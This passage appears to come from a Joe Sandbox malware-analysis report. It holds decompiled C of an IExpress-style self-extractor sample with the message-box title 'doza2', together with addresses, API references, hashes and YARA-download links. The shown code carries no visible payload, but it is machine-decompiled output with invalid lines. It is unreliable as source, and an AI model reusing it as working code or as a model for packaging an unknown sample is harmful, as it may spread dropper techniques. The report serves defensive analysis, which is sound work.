				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x408184 = 1;
						 *0x408180 = 1;
						L13:
						 *0x409a40 = _t119;
						L14:
						__eflags =  *0x408a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x408a38 & 0x00000001;
											if(( *0x408a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0040681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E004067C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E004028E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x409a40 = _t119;
						 *0x408184 = 1;
						 *0x408180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x409a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x408184 = _t135;
							 *0x408180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E004044B9(0, _t138);
					L66:
					return E00406CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                    0x004036f9
                                                                                                                                                                                                                                    0x00403700
                                                                                                                                                                                                                                    0x0040370c
                                                                                                                                                                                                                                    0x00403716
                                                                                                                                                                                                                                    0x00403718
                                                                                                                                                                                                                                    0x0040371b
                                                                                                                                                                                                                                    0x00403721
                                                                                                                                                                                                                                    0x0040372b
                                                                                                                                                                                                                                    0x0040373d
                                                                                                                                                                                                                                    0x00403745
                                                                                                                                                                                                                                    0x00403746
                                                                                                                                                                                                                                    0x00403746
                                                                                                                                                                                                                                    0x00403749
                                                                                                                                                                                                                                    0x004037ab
                                                                                                                                                                                                                                    0x004037ad
                                                                                                                                                                                                                                    0x004037ae
                                                                                                                                                                                                                                    0x004037b3
                                                                                                                                                                                                                                    0x004037b8
                                                                                                                                                                                                                                    0x004037b8
                                                                                                                                                                                                                                    0x004037bf
                                                                                                                                                                                                                                    0x004037bf
                                                                                                                                                                                                                                    0x004037c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004037cb
                                                                                                                                                                                                                                    0x004037cd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004037d5
                                                                                                                                                                                                                                    0x004037db
                                                                                                                                                                                                                                    0x004037e8
                                                                                                                                                                                                                                    0x004037ea
                                                                                                                                                                                                                                    0x004037ea
                                                                                                                                                                                                                                    0x004037ea
                                                                                                                                                                                                                                    0x004037f0
                                                                                                                                                                                                                                    0x004037f6
                                                                                                                                                                                                                                    0x00403805
                                                                                                                                                                                                                                    0x00403817
                                                                                                                                                                                                                                    0x0040382b
                                                                                                                                                                                                                                    0x00403830
                                                                                                                                                                                                                                    0x00403836
                                                                                                                                                                                                                                    0x0040383b
                                                                                                                                                                                                                                    0x0040383d
                                                                                                                                                                                                                                    0x004038eb
                                                                                                                                                                                                                                    0x004038eb
                                                                                                                                                                                                                                    0x004038f2
                                                                                                                                                                                                                                    0x0040390c
                                                                                                                                                                                                                                    0x00403911
                                                                                                                                                                                                                                    0x00403911
                                                                                                                                                                                                                                    0x00403913
                                                                                                                                                                                                                                    0x0040394d
                                                                                                                                                                                                                                    0x0040394d
                                                                                                                                                                                                                                    0x0040394f
                                                                                                                                                                                                                                    0x004038a9
                                                                                                                                                                                                                                    0x004038a9
                                                                                                                                                                                                                                    0x004038b0
                                                                                                                                                                                                                                    0x004038b2
                                                                                                                                                                                                                                    0x004038b9
                                                                                                                                                                                                                                    0x004038bb
                                                                                                                                                                                                                                    0x004038c1
                                                                                                                                                                                                                                    0x00403975
                                                                                                                                                                                                                                    0x004038c7
                                                                                                                                                                                                                                    0x004038de
                                                                                                                                                                                                                                    0x004038e0
                                                                                                                                                                                                                                    0x004038e0
                                                                                                                                                                                                                                    0x0040397b
                                                                                                                                                                                                                                    0x0040397d
                                                                                                                                                                                                                                    0x004039a9
                                                                                                                                                                                                                                    0x0040397f
                                                                                                                                                                                                                                    0x00403982
                                                                                                                                                                                                                                    0x0040398b
                                                                                                                                                                                                                                    0x0040398d
                                                                                                                                                                                                                                    0x0040398f
                                                                                                                                                                                                                                    0x0040399f
                                                                                                                                                                                                                                    0x004039a1
                                                                                                                                                                                                                                    0x00403991
                                                                                                                                                                                                                                    0x00403991
                                                                                                                                                                                                                                    0x00403991
                                                                                                                                                                                                                                    0x0040398f
                                                                                                                                                                                                                                    0x004039af
                                                                                                                                                                                                                                    0x004039b6
                                                                                                                                                                                                                                    0x00403a0f
                                                                                                                                                                                                                                    0x00403a0f
                                                                                                                                                                                                                                    0x00403a11
                                                                                                                                                                                                                                    0x00403a13
                                                                                                                                                                                                                                    0x00403a19
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039b8
                                                                                                                                                                                                                                    0x004039b8
                                                                                                                                                                                                                                    0x004039ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039bc
                                                                                                                                                                                                                                    0x004039bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039c3
                                                                                                                                                                                                                                    0x004039c9
                                                                                                                                                                                                                                    0x004039ce
                                                                                                                                                                                                                                    0x004039d0
                                                                                                                                                                                                                                    0x004039e3
                                                                                                                                                                                                                                    0x004039e5
                                                                                                                                                                                                                                    0x004039e6
                                                                                                                                                                                                                                    0x004039f1
                                                                                                                                                                                                                                    0x004039f7
                                                                                                                                                                                                                                    0x004039fa
                                                                                                                                                                                                                                    0x00403a01
                                                                                                                                                                                                                                    0x00403a04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403a06
                                                                                                                                                                                                                                    0x00403a09
                                                                                                                                                                                                                                    0x00403a09
                                                                                                                                                                                                                                    0x00403a0b
                                                                                                                                                                                                                                    0x00403a0b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403a09
                                                                                                                                                                                                                                    0x004039fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039fc
                                                                                                                                                                                                                                    0x004039d3
                                                                                                                                                                                                                                    0x004039d8
                                                                                                                                                                                                                                    0x004039da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039dc
                                                                                                                                                                                                                                    0x004039b6
                                                                                                                                                                                                                                    0x00403955
                                                                                                                                                                                                                                    0x0040395b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403961
                                                                                                                                                                                                                                    0x00403963
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403969
                                                                                                                                                                                                                                    0x00403969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403969
                                                                                                                                                                                                                                    0x00403915
                                                                                                                                                                                                                                    0x00403915
                                                                                                                                                                                                                                    0x0040391b
                                                                                                                                                                                                                                    0x0040391f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040392d
                                                                                                                                                                                                                                    0x00403933
                                                                                                                                                                                                                                    0x00403938
                                                                                                                                                                                                                                    0x0040393a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403940
                                                                                                                                                                                                                                    0x00403946
                                                                                                                                                                                                                                    0x0040394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004038f2
                                                                                                                                                                                                                                    0x00403843
                                                                                                                                                                                                                                    0x00403845
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040384b
                                                                                                                                                                                                                                    0x0040384d
                                                                                                                                                                                                                                    0x00403883
                                                                                                                                                                                                                                    0x00403885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040389a
                                                                                                                                                                                                                                    0x0040389e
                                                                                                                                                                                                                                    0x0040389e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004038a0
                                                                                                                                                                                                                                    0x004038a0
                                                                                                                                                                                                                                    0x004038a2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004038a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004038a4
                                                                                                                                                                                                                                    0x0040384f
                                                                                                                                                                                                                                    0x00403851
                                                                                                                                                                                                                                    0x00403857
                                                                                                                                                                                                                                    0x0040386e
                                                                                                                                                                                                                                    0x00403877
                                                                                                                                                                                                                                    0x0040387b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403881
                                                                                                                                                                                                                                    0x00403859
                                                                                                                                                                                                                                    0x0040385c
                                                                                                                                                                                                                                    0x00403862
                                                                                                                                                                                                                                    0x00403866
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403868
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004038f4
                                                                                                                                                                                                                                    0x004038f4
                                                                                                                                                                                                                                    0x004038f5
                                                                                                                                                                                                                                    0x004038fb
                                                                                                                                                                                                                                    0x00403901
                                                                                                                                                                                                                                    0x00403901
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040390a
                                                                                                                                                                                                                                    0x0040374b
                                                                                                                                                                                                                                    0x0040374e
                                                                                                                                                                                                                                    0x0040375c
                                                                                                                                                                                                                                    0x00403764
                                                                                                                                                                                                                                    0x00403769
                                                                                                                                                                                                                                    0x0040376e
                                                                                                                                                                                                                                    0x00403771
                                                                                                                                                                                                                                    0x0040379c
                                                                                                                                                                                                                                    0x0040379f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004037a3
                                                                                                                                                                                                                                    0x004037a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004037a4
                                                                                                                                                                                                                                    0x00403773
                                                                                                                                                                                                                                    0x00403777
                                                                                                                                                                                                                                    0x00403778
                                                                                                                                                                                                                                    0x0040377f
                                                                                                                                                                                                                                    0x00403781
                                                                                                                                                                                                                                    0x0040378e
                                                                                                                                                                                                                                    0x0040378e
                                                                                                                                                                                                                                    0x00403794
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403794
                                                                                                                                                                                                                                    0x00403783
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403785
                                                                                                                                                                                                                                    0x0040378c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040378c
                                                                                                                                                                                                                                    0x00403750
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040372d
                                                                                                                                                                                                                                    0x0040372d
                                                                                                                                                                                                                                    0x0040396b
                                                                                                                                                                                                                                    0x0040396b
                                                                                                                                                                                                                                    0x0040396c
                                                                                                                                                                                                                                    0x0040396e
                                                                                                                                                                                                                                    0x0040396f
                                                                                                                                                                                                                                    0x00403a1e
                                                                                                                                                                                                                                    0x00403a1e
                                                                                                                                                                                                                                    0x00403a22
                                                                                                                                                                                                                                    0x00403a27
                                                                                                                                                                                                                                    0x00403a3e
                                                                                                                                                                                                                                    0x00403a3e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00403723
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 004039C3
                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 004039F1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                                                    • String ID: 3$doza2
                                                                                                                                                                                                                                    • API String ID: 2519184315-2054879145
                                                                                                                                                                                                                                    • Opcode ID: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
                                                                                                                                                                                                                                    • Instruction ID: b81105887f12e35a37dab4eacb44c34be458b82212792c55bce88564180a53cc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB91E4B1B012149BEB34DF15CD407AA7BA8AB85306F1540BBD989BB2D1D7788F81CF49
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00406517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                    			E00406517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x409a3c; // 0x400000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E004044B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0x402ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                    0x0040651f
                                                                                                                                                                                                                                    0x0040652a
                                                                                                                                                                                                                                    0x00406534
                                                                                                                                                                                                                                    0x0040656b
                                                                                                                                                                                                                                    0x00406577
                                                                                                                                                                                                                                    0x0040657c
                                                                                                                                                                                                                                    0x0040657c
                                                                                                                                                                                                                                    0x00406536
                                                                                                                                                                                                                                    0x0040653e
                                                                                                                                                                                                                                    0x00406542
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406544
                                                                                                                                                                                                                                    0x00406547
                                                                                                                                                                                                                                    0x0040654c
                                                                                                                                                                                                                                    0x00406549
                                                                                                                                                                                                                                    0x00406549
                                                                                                                                                                                                                                    0x00406549
                                                                                                                                                                                                                                    0x0040655e
                                                                                                                                                                                                                                    0x00406560
                                                                                                                                                                                                                                    0x00406569
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406569
                                                                                                                                                                                                                                    0x00406542
                                                                                                                                                                                                                                    0x00406587

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
                                                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                    • String ID: .@
                                                                                                                                                                                                                                    • API String ID: 1214682469-2582305824
                                                                                                                                                                                                                                    • Opcode ID: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
                                                                                                                                                                                                                                    • Instruction ID: b6aca25b56715203ff799519597f98c75816ff70f42a55b2cf7247ba824ed053
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC012672100219BBCB105F69AC08DBB7A6CEB89364F01013AFE01B3290D7758C308AA9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00406495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E00406495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x408004; // 0x8f135e3b
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00401781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E0040658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00406CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                    0x00406495
                                                                                                                                                                                                                                    0x00406495
                                                                                                                                                                                                                                    0x004064a0
                                                                                                                                                                                                                                    0x004064a7
                                                                                                                                                                                                                                    0x004064ab
                                                                                                                                                                                                                                    0x004064bd
                                                                                                                                                                                                                                    0x004064c2
                                                                                                                                                                                                                                    0x004064d3
                                                                                                                                                                                                                                    0x004064df
                                                                                                                                                                                                                                    0x004064e8
                                                                                                                                                                                                                                    0x00406502
                                                                                                                                                                                                                                    0x004064ee
                                                                                                                                                                                                                                    0x004064f9
                                                                                                                                                                                                                                    0x004064f9
                                                                                                                                                                                                                                    0x00406516

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064DF
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064F9
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00406502
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                    • API String ID: 438848745-258089097
                                                                                                                                                                                                                                    • Opcode ID: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
                                                                                                                                                                                                                                    • Instruction ID: f343e68db0231e3b1b86542e237e673f83042691aa5beef6a9f0cd15a7b4c131
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F012630A00108ABE710DB60EC49EEE7338DB54314F5001BAF586B21D0CF789E968A09
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E00404169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0040468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0040468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E004044B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                    0x0040417d
                                                                                                                                                                                                                                    0x0040418f
                                                                                                                                                                                                                                    0x00404193
                                                                                                                                                                                                                                    0x004041b7
                                                                                                                                                                                                                                    0x004041d3
                                                                                                                                                                                                                                    0x004041e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004041e7
                                                                                                                                                                                                                                    0x004041d5
                                                                                                                                                                                                                                    0x004041d6
                                                                                                                                                                                                                                    0x004041d8
                                                                                                                                                                                                                                    0x004041d9
                                                                                                                                                                                                                                    0x004041da
                                                                                                                                                                                                                                    0x004041df
                                                                                                                                                                                                                                    0x004041e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004041e1
                                                                                                                                                                                                                                    0x004041b9
                                                                                                                                                                                                                                    0x004041ba
                                                                                                                                                                                                                                    0x004041bc
                                                                                                                                                                                                                                    0x004041bd
                                                                                                                                                                                                                                    0x004041be
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004041be
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
